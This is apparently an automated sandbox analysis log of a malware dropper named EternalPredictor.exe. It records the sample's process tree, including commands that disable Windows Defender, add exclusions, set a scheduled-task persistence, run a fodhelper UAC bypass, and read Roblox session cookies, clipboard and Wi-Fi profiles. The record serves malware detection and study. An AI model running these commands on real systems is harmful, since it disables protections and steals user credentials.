Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: SecurityHealthSystray.exe, 00000036.00000002.1707554882.00000000015E0000.00000004.00000001.01000000.0000001E.sdmp | Binary or memory string: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)C:\Windows\system32\;
Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: EternalPredictor.exe | Virustotal: Detection: 56%
Source: EternalPredictor.exe | ReversingLabs: Detection: 57%
Source: program.exe | String found in binary or memory: set-addPolicy
Source: program.exe | String found in binary or memory: id-cmc-addExtensions
Source: unknown | Process created: C:\Users\user\Desktop\EternalPredictor.exe "C:\Users\user\Desktop\EternalPredictor.exe"
Source: C:\Users\user\Desktop\EternalPredictor.exe | Process created: C:\Users\user\AppData\Roaming\eternal.exe "C:\Users\user\AppData\Roaming\eternal.exe"
Source: C:\Users\user\Desktop\EternalPredictor.exe | Process created: C:\Users\user\AppData\Roaming\skuld.exe "C:\Users\user\AppData\Roaming\skuld.exe"
Source: C:\Users\user\AppData\Roaming\skuld.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EternalPredictor.exe | Process created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe"
Source: C:\Users\user\AppData\Roaming\skuld.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\skuld.exe
Source: C:\Users\user\AppData\Roaming\skuld.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe"
Source: C:\Users\user\AppData\Roaming\skuld.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Users\user\AppData\Roaming\eternal.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'"
Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: unknown | Process created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C fodhelper
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6092 324 0000019985E22B80
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Process created: C:\Users\user\AppData\Roaming\eternal.exe "C:\Users\user\AppData\Roaming\eternal.exe"
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Process created: C:\Users\user\AppData\Roaming\skuld.exe "C:\Users\user\AppData\Roaming\skuld.exe"
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Process created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe"
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
                        Source: C:\Users\user\AppData\Roaming\skuld.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\skuld.exe
                        Source: C:\Users\user\AppData\Roaming\skuld.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Users\user\AppData\Roaming\skuld.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\consent.exe consent.exe 6092 324 0000019985E22B80
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: unknown unknown
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C fodhelper
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
                        Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
